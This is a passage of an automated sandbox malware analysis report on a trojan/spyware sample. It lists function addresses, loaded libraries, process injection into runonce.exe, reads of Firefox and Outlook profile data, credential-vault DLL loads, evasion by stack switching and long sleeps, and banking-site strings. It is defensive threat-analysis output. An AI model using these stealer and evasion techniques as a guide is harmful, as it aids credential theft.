Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D42446	10_2_04D42446
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D34420	10_2_04D34420
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D50591	10_2_04D50591
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C90535	10_2_04C90535
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CAC6E0	10_2_04CAC6E0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C8C7C0	10_2_04C8C7C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CB4750	10_2_04CB4750
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C90770	10_2_04C90770
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D22000	10_2_04D22000
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D481CC	10_2_04D481CC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D441A2	10_2_04D441A2
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D501AA	10_2_04D501AA
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D18158	10_2_04D18158
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C80100	10_2_04C80100
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D2A118	10_2_04D2A118
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D102C0	10_2_04D102C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D30274	10_2_04D30274
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D503E6	10_2_04D503E6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C9E3F0	10_2_04C9E3F0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4A352	10_2_04D4A352
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C80CF2	10_2_04C80CF2
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D30CB5	10_2_04D30CB5
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C90C00	10_2_04C90C00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C8ADE0	10_2_04C8ADE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CA8DBF	10_2_04CA8DBF
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C9AD00	10_2_04C9AD00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D2CD1F	10_2_04D2CD1F
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4EEDB	10_2_04D4EEDB
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4CE93	10_2_04D4CE93
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CA2E90	10_2_04CA2E90
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C90E59	10_2_04C90E59
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4EE26	10_2_04D4EE26
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C82FC8	10_2_04C82FC8
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C9CFE0	10_2_04C9CFE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D0EFA0	10_2_04D0EFA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D04F40	10_2_04D04F40
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D32F30	10_2_04D32F30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CD2F28	10_2_04CD2F28
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CB0F30	10_2_04CB0F30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CBE8F0	10_2_04CBE8F0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C768B8	10_2_04C768B8
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C9A840	10_2_04C9A840
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C92840	10_2_04C92840
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C929A0	10_2_04C929A0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D5A9A6	10_2_04D5A9A6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CA6962	10_2_04CA6962
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C8EA80	10_2_04C8EA80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D46BD7	10_2_04D46BD7
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4AB40	10_2_04D4AB40
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C81460	10_2_04C81460
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4F43F	10_2_04D4F43F
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D595C3	10_2_04D595C3
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D2D5B0	10_2_04D2D5B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D47571	10_2_04D47571
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D416CC	10_2_04D416CC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CD5630	10_2_04CD5630
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4F7B0	10_2_04D4F7B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C970C0	10_2_04C970C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D3F0CC	10_2_04D3F0CC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4F0E0	10_2_04D4F0E0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D470E9	10_2_04D470E9
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C9B1B0	10_2_04C9B1B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CC516C	10_2_04CC516C
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C7F172	10_2_04C7F172
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D5B16B	10_2_04D5B16B
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CAB2C0	10_2_04CAB2C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D312ED	10_2_04D312ED
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C952A0	10_2_04C952A0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CD739A	10_2_04CD739A
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C7D34C	10_2_04C7D34C
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4132D	10_2_04D4132D
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4FCF2	10_2_04D4FCF2
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D09C32	10_2_04D09C32
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CAFDC0	10_2_04CAFDC0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C93D40	10_2_04C93D40
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D41D5A	10_2_04D41D5A
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D47D73	10_2_04D47D73
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C99EB0	10_2_04C99EB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C53FD5	10_2_04C53FD5
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C53FD2	10_2_04C53FD2
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C91F92	10_2_04C91F92
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4FFB1	10_2_04D4FFB1
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4FF09	10_2_04D4FF09
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C938E0	10_2_04C938E0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CFD800	10_2_04CFD800
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C99950	10_2_04C99950
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CAB950	10_2_04CAB950
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D25910	10_2_04D25910
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D3DAC6	10_2_04D3DAC6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CD5AA0	10_2_04CD5AA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D31AA3	10_2_04D31AA3
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D2DAAC	10_2_04D2DAAC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D47A46	10_2_04D47A46
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4FA49	10_2_04D4FA49
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D03A6C	10_2_04D03A6C
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D05BF0	10_2_04D05BF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CCDBF9	10_2_04CCDBF9
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04CAFB80	10_2_04CAFB80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04D4FB76	10_2_04D4FB76
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CA1FD0	10_2_02CA1FD0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02C9CE47	10_2_02C9CE47
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02C9CE50	10_2_02C9CE50
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02C9B060	10_2_02C9B060
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02C9D070	10_2_02C9D070
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02C9B1F9	10_2_02C9B1F9
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02C9B1A4	10_2_02C9B1A4
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02C9B1B0	10_2_02C9B1B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CA5670	10_2_02CA5670
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CA3880	10_2_02CA3880
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CA387B	10_2_02CA387B
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CBBE50	10_2_02CBBE50
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04AAE467	10_2_04AAE467
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04AAE7FC	10_2_04AAE7FC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04AAD8C8	10_2_04AAD8C8

Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: String function: 0154EA12 appears 86 times
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: String function: 01515130 appears 58 times
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: String function: 0155F290 appears 105 times
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: String function: 014CB970 appears 280 times
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: String function: 01527E54 appears 102 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 04CC5130 appears 58 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 04CD7E54 appears 111 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 04C7B970 appears 280 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 04CFEA12 appears 86 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 04D0F290 appears 105 times

Source: gH68ux6XtG.exe

Static PE information: No import functions for PE file found

Source: gH68ux6XtG.exe, 00000000.00000003.2642198409.000000000112C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs gH68ux6XtG.exe
Source: gH68ux6XtG.exe, 00000000.00000002.2756546792.0000000001771000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs gH68ux6XtG.exe
Source: gH68ux6XtG.exe, 00000000.00000003.2644528670.000000000130D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs gH68ux6XtG.exe
Source: gH68ux6XtG.exe, 00000000.00000003.2755799801.00000000013BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRUNONCE.EXEj% vs gH68ux6XtG.exe

Source: gH68ux6XtG.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: gH68ux6XtG.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: gH68ux6XtG.exe

Static PE information: Section .text

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/1@5/5

Source: C:\Windows\SysWOW64\runonce.exe

File created: C:\Users\user\AppData\Local\Temp\6511-iOQ--

Jump to behavior

Source: gH68ux6XtG.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\gH68ux6XtG.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: runonce.exe, 0000000A.00000003.2936723960.0000000002D75000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2940960709.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3501224102.0000000002DC5000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2937652096.0000000002D96000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3501224102.0000000002D96000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: gH68ux6XtG.exe	Virustotal: Detection: 76%
Source: gH68ux6XtG.exe	ReversingLabs: Detection: 78%

Source: unknown	Process created: C:\Users\user\Desktop\gH68ux6XtG.exe "C:\Users\user\Desktop\gH68ux6XtG.exe"
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
Source: C:\Windows\SysWOW64\runonce.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\runonce.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\runonce.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: gH68ux6XtG.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: runonce.pdbGCTL source: gH68ux6XtG.exe, 00000000.00000003.2755799801.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, 5gtNFDn9VkJys5w.exe, 00000009.00000002.3501810615.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: gH68ux6XtG.exe, 00000000.00000003.2644528670.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, gH68ux6XtG.exe, 00000000.00000003.2642198409.0000000001009000.00000004.00000020.00020000.00000000.sdmp, gH68ux6XtG.exe, 00000000.00000002.2756546792.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, gH68ux6XtG.exe, 00000000.00000002.2756546792.000000000163E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3503190444.0000000004C50000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2758014383.0000000004AA1000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3503190444.0000000004DEE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2755309977.00000000048FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: gH68ux6XtG.exe, gH68ux6XtG.exe, 00000000.00000003.2644528670.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, gH68ux6XtG.exe, 00000000.00000003.2642198409.0000000001009000.00000004.00000020.00020000.00000000.sdmp, gH68ux6XtG.exe, 00000000.00000002.2756546792.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, gH68ux6XtG.exe, 00000000.00000002.2756546792.000000000163E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 0000000A.00000002.3503190444.0000000004C50000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2758014383.0000000004AA1000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3503190444.0000000004DEE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2755309977.00000000048FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: runonce.pdb source: gH68ux6XtG.exe, 00000000.00000003.2755799801.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, 5gtNFDn9VkJys5w.exe, 00000009.00000002.3501810615.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 5gtNFDn9VkJys5w.exe, 00000009.00000002.3501497203.000000000092F000.00000002.00000001.01000000.00000005.sdmp, 5gtNFDn9VkJys5w.exe, 0000000B.00000002.3501813759.000000000092F000.00000002.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C7F04F push ebx; ret	0_2_00C7F058
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C63280 push eax; ret	0_2_00C63282
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C7ABD6 push ds; ret	0_2_00C7ABD8
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C6D38A push edx; iretd	0_2_00C6D453
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C7AB61 pushfd ; ret	0_2_00C7AB78
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C86CC3 pushad ; iretd	0_2_00C86CEB
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C684DA push esi; retf	0_2_00C684DD
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C684FF push ebp; iretd	0_2_00C68502
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C725DC pushfd ; iretd	0_2_00C725FB
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C72559 push ecx; iretd	0_2_00C7255A
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C65E25 push ecx; ret	0_2_00C65E2B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_00C61F0E push ss; retf	0_2_00C61F14
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D09AD push ecx; mov dword ptr [esp], ecx	0_2_014D09B6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C527FA pushad ; ret	10_2_04C527F9
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C5225F pushad ; ret	10_2_04C527F9
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C5283D push eax; iretd	10_2_04C52858
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04C809AD push ecx; mov dword ptr [esp], ecx	10_2_04C809B6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02C92BA2 push ecx; ret	10_2_02C92BA8
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02C9F2D6 push ecx; iretd	10_2_02C9F2D7
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02C95257 push esi; retf	10_2_02C9525A
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02C9527C push ebp; iretd	10_2_02C9527F
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02C9F359 pushfd ; iretd	10_2_02C9F378
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CB3A40 pushad ; iretd	10_2_02CB3A68
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CA7B60 push FFFFFFC3h; ret	10_2_02CA7BCA
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CA78DE pushfd ; ret	10_2_02CA78F5
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CA7953 push ds; ret	10_2_02CA7955
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_02CABDCC push ebx; ret	10_2_02CABDD5
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04AA6482 push cs; retf	10_2_04AA6492
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04AA66D1 push ebx; ret	10_2_04AA66D2
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04AA4626 push 0CD768ABh; retf	10_2_04AA46A8
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 10_2_04AA466D push 0CD768ABh; retf	10_2_04AA46A8

Source: gH68ux6XtG.exe

Static PE information: section name: .text entropy: 7.995371293227675

Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Users\user\Desktop\gH68ux6XtG.exe

Code function: 0_2_0151096E rdtsc

0_2_0151096E

Source: C:\Windows\SysWOW64\runonce.exe

Window / User API: threadDelayed 9725

Jump to behavior

Source: C:\Users\user\Desktop\gH68ux6XtG.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\runonce.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\runonce.exe TID: 2264	Thread sleep count: 248 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe TID: 2264	Thread sleep time: -496000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe TID: 2264	Thread sleep count: 9725 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe TID: 2264	Thread sleep time: -19450000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe TID: 6080	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\runonce.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\runonce.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\runonce.exe

Code function: 10_2_02CAC8D0 FindFirstFileW,FindNextFileW,FindClose,

10_2_02CAC8D0

Source: 6511-iOQ--.10.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 6511-iOQ--.10.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
